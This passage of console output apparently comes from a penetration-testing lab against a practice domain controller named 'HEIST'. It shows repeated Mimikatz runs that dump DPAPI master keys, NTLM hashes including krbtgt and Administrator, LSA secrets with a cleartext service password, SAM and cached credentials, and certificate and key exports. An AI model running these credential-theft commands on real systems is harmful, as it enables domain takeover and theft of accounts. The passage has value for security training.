User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-96-0-0
 
 
Authentication Id : 0 ; 42510 (00000000:0000a60e)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-96-0-1
 
 
Authentication Id : 0 ; 42419 (00000000:0000a5b3)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:32 PM
SID               : S-1-5-96-0-0
 
 
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : DC01$
Domain            : HEIST
Logon Server      : (null)
Logon Time        : 8/1/2024 7:27:30 PM
SID               : S-1-5-18
	 [00000000]
	 * GUID      :	{392a6512-1525-4008-b23e-25de0a07551a}
	 * Time      :	7/7/2025 9:51:33 AM
	 * MasterKey :	2066f53e136763a9795d5ae9af43bc4cdb73725d302b17473aac944e21591159852109a89ba6a33193c894f30498f258ff9ebbbcf6f1bb63f9a52fc3c3c9eab7
	 * sha1(key) :	4903692de0abcea97a9b9542de21eebea659d6aa
	 [00000001]
	 * GUID      :	{de8ed9c0-3657-4403-b29f-de083ac87fbe}
	 * Time      :	7/7/2025 7:07:53 AM
	 * MasterKey :	d3782da157dc6f42d3b37429d48717e2985078d0620a7d047818264c06862dde0761d325ee2526272b7f1ace35e2843580332c1f2dac660b7d0a80e57c8d241a
	 * sha1(key) :	b477599a23d330e8d3b8d6a7a04863f16c5f9637
	 [00000002]
	 * GUID      :	{fe3da89d-a34f-4b38-9131-2fa7e1cf7289}
	 * Time      :	7/7/2025 6:38:54 AM
	 * MasterKey :	54d9276abda081c84dc7362e55e6b0cecee8ada0d58fe1887a720c7d6546d1463939b78ee9d7575e06074b7fe33d0603dbecd4ba5efdfe276a0cf8090c01a361
	 * sha1(key) :	4d9f7168a37cd8e0f8eee77d8a3b040d804b3951
	 [00000003]
	 * GUID      :	{d7f96ad7-0001-4a49-a80a-330f4618f11d}
	 * Time      :	8/1/2024 7:27:32 PM
	 * MasterKey :	df728e14eb5d4a2189e63f0d23ce99c4b8ea145e3f9b255a48389e2d387755db6612029f57f873aed6e359eff43409af4a1d7b6f92a3799ed9555d234de46edb
	 * sha1(key) :	efe4285454fd8e475aab94594aaec67af54f0da5
	 [00000004]
	 * GUID      :	{6ecc8dea-14dc-4829-82bd-b4d5bd8e8bd1}
	 * Time      :	7/7/2025 10:21:18 AM
	 * MasterKey :	d2f0f20f97dfe5bea753fda881b9dce0c0b620c09ff5fa910db33ffe4bb26577ac7d58f5585b1b33a8cf9fdea5b54d26ba4a22ce74795c8e71f34861b0804b05
	 * sha1(key) :	fead27a4574dbccd155e6d98016bb1f5d557983d
	 [00000005]
	 * GUID      :	{88612f0d-e589-4062-ac72-b9de3850e985}
	 * Time      :	8/1/2024 7:27:32 PM
	 * MasterKey :	051b435a3d09f1ca87693af5494efbcc69c72ba48f1459c4e5d150f7832763e40ddee60c924e05f4b8c89db7fe446883f19fa82050e6a45da7efc271dc360865
	 * sha1(key) :	21eb6e12b3b55e0fef5818d8e9a861c9e4aa28b7
	 [00000006]
	 * GUID      :	{9ed8ba17-ab19-4b17-9456-739c7ef727a8}
	 * Time      :	8/1/2024 7:27:32 PM
	 * MasterKey :	45c6c09e8f523c8c2d01ce3552ab3c10a3cb074f12af66ab3a0082835a2e10a22ac1836b95af16213124699c1b962034ecb414ca4e25c26224fbff9f7cff83e9
	 * sha1(key) :	fe2da4f188e041b38ebbf075d53e2d2063d68612
 
 
mimikatz(commandline) # exit
Bye!

lsadump::lsa /patch


PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::lsa /patch" "exit"    # Domain hashes + LSA secrets
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM
 
568	{0;000003e7} 1 D 34989     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 80734885  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 80759415  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
 
mimikatz(commandline) # lsadump::lsa /patch
Domain : HEIST / S-1-5-21-537427935-490066102-1511301751
 
RID  : 000001f4 (500)
User : Administrator
LM   : 
NTLM : b325100ee400c16d56c42f9685381139
 
RID  : 000001f5 (501)
User : Guest
LM   : 
NTLM : 
 
RID  : 000001f6 (502)
User : krbtgt
LM   : 
NTLM : 3198641a390fccf87a72629f8fd1bd37
 
RID  : 0000044f (1103)
User : enox
LM   : 
NTLM : bddb2a060aac3fb97c34707fabee7f30
 
RID  : 000003e8 (1000)
User : DC01$
LM   : 
NTLM : 1561bd404f929907a89517d421b5f11b
 
RID  : 00000451 (1105)
User : svc_apache$
LM   : 
NTLM : f018713880015ab7b496f7bbf049f0fc
 
mimikatz(commandline) # exit
Bye!

  • Administrator:b325100ee400c16d56c42f9685381139
  • krbtgt:3198641a390fccf87a72629f8fd1bd37
  • enox:bddb2a060aac3fb97c34707fabee7f30
  • DC01$:1561bd404f929907a89517d421b5f11b
  • svc_apache$:f018713880015ab7b496f7bbf049f0fc

lsadump::sam


PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"    # Local account hashes
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM
 
568	{0;000003e7} 1 D 34989     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 80784968  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 80809719  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
 
mimikatz(commandline) # lsadump::sam
Domain : DC01
SysKey : e9a15188a6ad2d20d26fe2bc984b369e
Local SID : S-1-5-21-3175827223-895852877-1244645759
 
SAMKey : 36d831352373d03423a9b862de0da6e3
 
RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 4942de0385b66f88cf6f9e2fb703ae7b
 
RID  : 000001f5 (501)
User : Guest
 
RID  : 000001f7 (503)
User : DefaultAccount
 
RID  : 000001f8 (504)
User : WDAGUtilityAccount
 
mimikatz(commandline) # exit
Bye!

lsadump::secrets


PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM
 
568	{0;000003e7} 1 D 34989     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 80812073  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 80836806  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
 
mimikatz(commandline) # lsadump::secrets
Domain : DC01
SysKey : e9a15188a6ad2d20d26fe2bc984b369e
 
Local name : DC01 ( S-1-5-21-3175827223-895852877-1244645759 )
Domain name : HEIST ( S-1-5-21-537427935-490066102-1511301751 )
Domain FQDN : heist.offsec
 
Policy subsystem is : 1.18
LSA Key(s) : 1, default {97026db5-2ce0-cfa9-294c-19088d8692ec}
  [00] {97026db5-2ce0-cfa9-294c-19088d8692ec} 132b5778987e2e72a0f2a7ce9a759b7e2789079d9197ca5bf434bcb2b42c0734
 
Secret  : $MACHINE.ACC
cur/hex : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9 
    NTLM:1561bd404f929907a89517d421b5f11b
    SHA1:38fa65451f13e088d5d078609994c1fd14a35412
old/hex : b8 f8 1e 5a 9c e3 67 61 83 b1 ba 0e 1f 39 34 bb 84 ec 48 c2 94 57 98 ec 84 b8 b0 93 f8 47 54 b9 ed 99 e6 e0 b5 8d 3e fc 86 06 c9 00 48 db 4b fb 39 4b bd 97 0b 9c d4 26 b5 d4 e9 92 f6 ba be 7d af 6c 39 c7 37 b7 a5 f4 a3 4d fa cf 34 fa c4 c3 ce 69 b2 b0 0c 08 9c c7 52 9a d8 f3 e4 c8 79 06 a0 42 c5 57 02 6b fb 12 74 d8 03 35 1d 84 4f da 88 4b f8 5a 75 e3 1c fd b5 b2 a2 c3 2b 64 d8 64 7f f7 a9 73 44 d0 c7 14 18 64 82 d6 b2 af 8f 9e 0d 1c 80 ea 6a 63 3f cc 2a a2 5c 47 44 5c 40 3c 34 2e 53 4b 80 1f 35 0e 15 2f 1a f7 28 09 c3 43 65 b2 a7 a7 7c 59 ff 1e 97 1e ce 18 9e 8a 32 46 74 54 c3 89 5c a0 25 74 d1 10 6d b3 3a 82 a5 9a 97 6d 00 58 0e 92 b9 d0 25 ee c5 93 05 33 3e c1 30 37 80 61 03 ff 05 15 40 b5 b0 f2 5d ca dc 8b 
    NTLM:148241f7e74d49393d9eccf5277edbd3
    SHA1:70b89c6ed37f0457887464cf40ccf318b8b79629
 
Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 3d f6 57 e4 61 73 98 e4 ab 73 e4 1c 61 83 f8 ac 3d 60 85 23 c6 9b 79 bd ce 1e 77 b2 20 43 bb b5 bd 33 6c 39 d3 96 50 12 
    full: 3df657e4617398e4ab73e41c6183f8ac3d608523c69b79bdce1e77b22043bbb5bd336c39d3965012
    m/u : 3df657e4617398e4ab73e41c6183f8ac3d608523 / c69b79bdce1e77b22043bbb5bd336c39d3965012
old/hex : 01 00 00 00 0e ed 6f c0 84 66 e9 5e 2d 4c c1 1d f7 5a ad bc ec 05 1f 17 7b a2 1a f3 20 6b 25 18 d4 21 23 c8 ef ff 96 9d 3d c5 eb c3 
    full: 0eed6fc08466e95e2d4cc11df75aadbcec051f177ba21af3206b2518d42123c8efff969d3dc5ebc3
    m/u : 0eed6fc08466e95e2d4cc11df75aadbcec051f17 / 7ba21af3206b2518d42123c8efff969d3dc5ebc3
 
Secret  : NL$KM
cur/hex : 4a e2 c6 53 5d 77 02 c9 ae a9 48 23 7c 5b 46 39 4a 56 02 3b cc 38 b8 c0 92 dd 41 2c 72 f2 63 46 71 36 1b e3 d2 ba e7 ac 8c bd e9 d5 55 36 c0 07 99 5a 11 4a 24 e4 42 e3 4c 12 3f f5 1b d7 d5 8c 
old/hex : 4a e2 c6 53 5d 77 02 c9 ae a9 48 23 7c 5b 46 39 4a 56 02 3b cc 38 b8 c0 92 dd 41 2c 72 f2 63 46 71 36 1b e3 d2 ba e7 ac 8c bd e9 d5 55 36 c0 07 99 5a 11 4a 24 e4 42 e3 4c 12 3f f5 1b d7 d5 8c 
 
Secret  : _SC_FlaskService / service 'FlaskService' with username : HEIST\enox
cur/text: california
 
Secret  : _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_7885a5def08901853c5c7bd844057ee9c666cd6e23e9b7a048577ac7248fa744ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
 
cur/hex : 39 93 45 ad d7 c8 6b 91 f3 d5 45 e3 94 06 ef d4 ed 0e b5 26 5e 6d ae 5f 1a d9 bf b6 f9 9c 8a f8 36 d8 28 23 5a 07 f3 eb d7 a9 53 d5 fe db 6f b3 c6 57 72 f2 55 5f 3e 42 0b c7 d3 0f 89 4a b9 ca f0 67 06 8c 97 63 94 80 43 f8 ad 68 26 ae 46 4c d6 89 69 9e dc 78 a9 8f c2 ef 55 a0 64 fc 1a 02 80 8a 1a 28 9e 6c 40 2b 4a 7c c6 9d 4a d7 e7 1a 04 40 0f 43 7d e8 f3 de 8f 9f 7e da bc d5 5e dd 29 c1 c3 e3 70 72 62 c0 e1 17 c9 35 d2 1c 5a 47 0e e5 52 91 a4 0d a2 a3 33 dd 97 ed af f2 d4 8d 03 62 82 c4 f8 ee 6e d2 7c 69 ae f6 05 7b 1e d0 93 f1 1d 09 04 fe 1f 2d a4 99 fc c3 e9 3c 71 0f 0b 0c fa 26 9b 41 f6 80 91 4f 44 90 5a 07 83 8b 66 51 8e 7b af 93 99 3a 13 78 14 4e a9 18 08 11 87 c8 e9 2f f5 3a 7c db de 92 65 a1 e7 e4 3d 8f 
 
Secret  : _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_7885a5def08901853c5c7bd844057ee9c666cd6e23e9b7a048577ac7248fa744ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
 
cur/hex : 01 00 00 00 22 01 00 00 10 00 00 00 12 01 1a 01 78 72 3b 48 77 d1 3c bc 7b 54 0e ec 50 53 48 3b 2a 4e f3 91 4a eb 7a d5 b5 c5 95 64 6f 8e 9a ea 8b 4e 73 d1 54 0a 6d 61 33 70 7e 23 55 12 1d bd 9a 57 5d 6c 3b 69 a2 37 1e 46 19 a9 c9 13 12 b8 dd da 9e e6 76 3e 12 92 91 67 32 04 c2 b0 c3 91 74 de 78 c0 fe c1 1c a7 98 72 94 ab 5a f9 b6 43 85 c8 ff 2b 94 3a 83 87 99 05 b1 dc 9c 04 62 f8 01 fb f7 7c 99 6b 6c 36 1b 30 7a e9 25 38 45 e1 2f ce 97 ea 98 49 5d cc b9 27 a7 b5 f9 bf 15 01 1b 04 c4 fd dd 3f f3 66 00 6f 17 de 30 68 83 fe d4 0b 7b 2f a9 3a 76 a4 48 8e f8 36 f5 c8 4e 0b 40 77 0c 5e b1 7c 71 df bc 1c 90 81 da dc 8e a3 b6 82 86 c2 f7 19 33 b4 3d a9 bb 8d 50 80 15 a9 8b 61 ba fc 65 f7 7d c6 0b fa b9 12 aa a3 3e 87 f7 74 8b f3 a5 61 bd 68 74 b4 93 6a f2 d3 3d f9 22 68 1e d1 09 20 e2 26 7d 89 be 11 9d 65 16 cc 00 00 9c 0a 85 37 44 17 00 00 9c ac b4 84 43 17 00 00 
 
mimikatz(commandline) # exit
Bye!

lsadump::cache


PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::cache" "exit"    # Cached domain credentials
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM
 
568	{0;000003e7} 1 D 34989     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 80844371  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 80869112  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
 
mimikatz(commandline) # lsadump::cache
Domain : DC01
SysKey : e9a15188a6ad2d20d26fe2bc984b369e
 
Local name : DC01 ( S-1-5-21-3175827223-895852877-1244645759 )
Domain name : HEIST ( S-1-5-21-537427935-490066102-1511301751 )
Domain FQDN : heist.offsec
 
Policy subsystem is : 1.18
LSA Key(s) : 1, default {97026db5-2ce0-cfa9-294c-19088d8692ec}
  [00] {97026db5-2ce0-cfa9-294c-19088d8692ec} 132b5778987e2e72a0f2a7ce9a759b7e2789079d9197ca5bf434bcb2b42c0734
 
* Iteration is set to default (10240)
 
mimikatz(commandline) # exit
Bye!

vault::list


PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "vault::list" "exit"     # Windows Vault list
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM
 
568	{0;000003e7} 1 D 34989     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 80869962  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 80894767  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
 
mimikatz(commandline) # vault::list
 
Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
	Name       : Web Credentials
	Path       : C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
	Items (0)
 
Vault : {77bc582b-f0a6-4e15-4e80-61736b6f3b29}
	Name       : Windows Credentials
	Path       : C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault
	Items (0)
 
mimikatz(commandline) # exit
Bye!

vault::cred


PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "vault::cred /patch" "exit"     # Windows Vault exfil
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM
 
568	{0;000003e7} 1 D 34989     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 80903955  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 80928791  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
 
mimikatz(commandline) # vault::cred /patch
 
mimikatz(commandline) # exit
Bye!

crypto module


PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "crypto::stores" "exit"
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM
 
568	{0;000003e7} 1 D 34989     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 80942855  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 80967734  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
 
mimikatz(commandline) # crypto::stores
Asking for System Store 'CURRENT_USER' (0x00010000)
 0. My
 1. Root
 2. Trust
 3. CA
 4. UserDS
 5. TrustedPublisher
 6. Disallowed
 7. AuthRoot
 8. TrustedPeople
 9. ClientAuthIssuer
10. SmartCardRoot
 
mimikatz(commandline) # exit
Bye!
 
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "crypto::providers" "exit"
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM
 
568	{0;000003e7} 1 D 34989     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 80969233  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 80994114  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
 
mimikatz(commandline) # crypto::providers
 
CryptoAPI providers :
 0. RSA_FULL      ( 1)   - Microsoft Base Cryptographic Provider v1.0
 1. DSS_DH        (13)   - Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
 2. DSS           ( 3)   - Microsoft Base DSS Cryptographic Provider
 3. RSA_FULL      ( 1) H - Microsoft Base Smart Card Crypto Provider
 4. DH_SCHANNEL   (18)   - Microsoft DH SChannel Cryptographic Provider
 5. RSA_FULL      ( 1)   - Microsoft Enhanced Cryptographic Provider v1.0
 6. DSS_DH        (13)   - Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
 7. RSA_AES       (24)   - Microsoft Enhanced RSA and AES Cryptographic Provider
 8. RSA_SCHANNEL  (12)   - Microsoft RSA SChannel Cryptographic Provider
 9. RSA_FULL      ( 1)   - Microsoft Strong Cryptographic Provider
 
CryptoAPI provider types:
 0. RSA_FULL      ( 1) - RSA Full (Signature and Key Exchange)
 1. DSS           ( 3) - DSS Signature
 2. RSA_SCHANNEL  (12) - RSA SChannel
 3. DSS_DH        (13) - DSS Signature with Diffie-Hellman Key Exchange
 4. DH_SCHANNEL   (18) - Diffie-Hellman SChannel
 5. RSA_AES       (24) - RSA Full and AES
 
CNG providers :
 0. Microsoft Key Protection Provider
 1. Microsoft Passport Key Storage Provider
 2. Microsoft Platform Crypto Provider
 3. Microsoft Primitive Provider
 4. Microsoft Smart Card Key Storage Provider
 5. Microsoft Software Key Storage Provider
 6. Microsoft SSL Protocol Provider
 7. Windows Client Key Protection Provider
 
mimikatz(commandline) # exit
Bye!
 
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "crypto::sc" "exit"
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM
 
568	{0;000003e7} 1 D 34989     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 80995755  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 81020729  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
 
mimikatz(commandline) # crypto::sc
ERROR kuhl_m_crypto_l_sc ; SCardEstablishContext: 0x8010001d
 
mimikatz(commandline) # exit
Bye!
 
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "crypto::certificates /export" "exit"
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM
 
568	{0;000003e7} 1 D 34989     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 81050156  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 81075033  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
 
mimikatz(commandline) # crypto::certificates /export
 * System Store  : 'CURRENT_USER' (0x00010000)
 * Store         : 'My'
 
 
mimikatz(commandline) # exit
Bye!
 
 
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "crypto::keys /export" "exit"
 
  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
 
mimikatz(commandline) # privilege::debug
Privilege '20' OK
 
mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM
 
568	{0;000003e7} 1 D 34989     	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 81075753  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,28p)	Primary
 * Thread Token  : {0;000003e7} 1 D 81100653  	NT AUTHORITY\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)
 
mimikatz(commandline) # crypto::keys /export
 * Store         : 'user'
 * Provider      : 'MS_ENHANCED_PROV' ('Microsoft Enhanced Cryptographic Provider v1.0')
 * Provider type : 'PROV_RSA_FULL' (1)
 * CNG Provider  : 'Microsoft Software Key Storage Provider'
 
CryptoAPI keys :
 
CNG keys :
    0. e7cdea7a-52c3-c502-fdfe-8c9e141907a0
	|Provider name : Microsoft Software Key Storage Provider
